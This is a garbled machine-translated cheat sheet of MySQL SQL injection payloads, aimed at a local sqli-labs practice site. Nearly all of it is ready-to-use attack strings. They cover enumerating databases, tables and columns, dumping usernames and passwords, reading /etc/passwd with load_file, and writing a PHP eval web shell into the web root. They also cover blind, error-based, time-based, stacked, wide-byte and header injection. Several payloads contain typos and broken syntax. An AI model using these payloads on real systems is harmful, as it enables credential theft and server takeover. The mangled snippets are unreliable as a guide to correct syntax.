The difference between 0x01 MySQL 5.0 and MySQL 5.0 or more of the following versions
MySQL5.0 above there is a named information_schema
database, which stores all the information in the database, which holds information on all other databases on the MySQL server maintenance. Such as database name, table, table column data types and access to the database and so on. And 5.0 or less no.
information_schema
System database, database records current database, tables, columns, user rights information
SCHEMATA
Mysql store all the basic information database, comprising the database name, path, etc. encoding type.
Query the database:
http://localhost/sqli-labs/Less-2/index.php?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata #
TABLES
Information stored in the mysql table, including the table is a base table or system tables, database engine, what is the number of table rows, creation time, last updated time.
Look-up table security library:
http://localhost/sqli-labs/Less-2/index.php?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' #
Mysql table storing column information, including information on all of the columns and each column of the table, the first column of the table columns, the column data type, coding type of the column, the column authority, the comment column and the like.
Column of the table query users
http://localhost/sqli-labs/Less-2/index.php?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' #
General information and statements 0x02
Current users: user ()
Database version: version ()
Database Name: database ()
Operating system: @@ version_compile_os
The basic flow injection manual 0x03
3.1 Gets the number of fields
order by n
3.2 Acquisition System database name
select 1,2,schema_name from information_schema.schemata
3.3 Get the current database name
select 1,2,3,database()
3.4 get the database table
select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()
or:
select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1
3.5 get the table field
select 1,2,group_concat(column_name) from information_shema.columns where table_schema=database() and table_name='users'
3.6 to get the value of each field
select 1,group_concat(username,password) from users
Read 3.7 files
select load_file('etc/passwd')
-
-
Current permissions on the file readable
-
File on the server
-
Path complete
-
File size less than max_allowed_packet
-
The current database user privileges FILE
-
secure_file_priv is empty, if the value is a directory, then it can only operate on the file directory
-
3.8 write file
select '<?php @eval($_POST[c];)?> intofile '/var/www/html/shell.php'
Prerequisites:
-
-
Target directory must be writable
-
The current database user must have FILE privileges
-
Destination file can not already exist
-
secure_file_priv is empty
-
Path complete
0x04 common injection method
4.1 union injection
The role of the union is a joint two sql statements. When the injection parameter data does not exist in the database, two joint sql statement, the contents of the previous statement selected is empty, the query statement of contents of the back can be displayed.
such as:
id=-1’ union select 1,2'
4.2 Boolean injection
Using the logical judgment
-
-
left(database(), 1) > 's'
-
ascii(substr((select table_name from information_schema.tables where tables_schema=database() limit 0,1),1,1))=101 --+
-
ascii(substr((select database()), 1,1))=98
-
ord(mid(select infull(cast(username as char), 0x20) from security.users ORDER BY id LIMIT 0,1), 1,1))>98%23
Explain: mid (a, b, c) starting from the position b, taken a bit string c Ord () function with the ascii (), the value of the character to ascii
-
regexp regular injection
select user() regexp '^[a-z]'
-
like matching injection
select user() like 'ro%'
-
4.3 error injection
Payload structure so that information via error messages echoing out through the Floor , updatexml , ExtractValue , NAME_CONST , Error based Double Query Injection and other methods.
-
-
floor
union select 1, count(*), concat(0x3a, 0x3a, (select user()), 0x3a, 0x3a, floor(rand(0)*2)) as a from information_schema.columns group by a
-
UpdatXml (having a length limit, maximum 32)
?id=1 and updatexml(1, concat(0x7e, (select @@version), 0x7e),1)
-
ExtractValue (having a length limit, maximum 32)
?id=1 and extractvalue(1, concat(0x7e, (select @@version),0x7e))
-
NAME_CONST
?id=261 and 1=(select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)
-
Error based Double Query Injection
?id=1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1
-
exp (5.5.5 above)
id=1 and (select exp(~(select * from(select user())x)))
-
polygon
id=1 and polygon((select * from(select * from(select user())a)b))
-
4.4 injection time
Delay Injection
?id=1 and if(ascii(substr(database(),1,1))>115, 1, sleep(5))
4.5 stacked query injection
Stack inquiry injected with Union query or query all the difference in the Union with a statement, the latter two execution is limited and can only be used to execute a query, can be injected into stacked execute arbitrary statement.
such as:
Oracle stack injection can not be used
id = 1';select if(substr(user(),1,1)='r', sleeep(3),1)%23
4.6 secondary injection
How it works: The first time the database to insert the data, just use addslashes
or by means of get_magic_quotes_gpc
special characters which were escaped, but when written to the database or keep the original data. For example, the input parameters are ' , addslashes
use \ After the escape, \ will not be inserted into the database, the database is retained ' .
After the database is stored into the database, developers default data is authentic, the next time the need for a query, remove the dirty data directly from the database, no further testing and treatment, this will cause the SQL secondary injection.
4.7 byte wide injection
Use conditions:
-
-
Query parameter is surrounded by single quotes, passed in single quotation marks escaped operations
-
GBK is encoded in the database
id=-1%df' union select 1, user(),3%23
Under these conditions, single quote 'be escaped as% 5c, so constitutes% df% 5c, while at GBK encoding,% df% 5c is a traditional Chinese characters, "even", the single quotation marks successful escape.
-
4.8 cookie injection
Cookie: id=1 and 1=1
4.9 base64 injection
Base64 encoding of the parameters, and then sends a request
4.10 XFF injection
XFF (X-Forward-For), referred XFF head, it represents a real client ip address
X-Forward-For:127.0.0.1' select 1,2,user()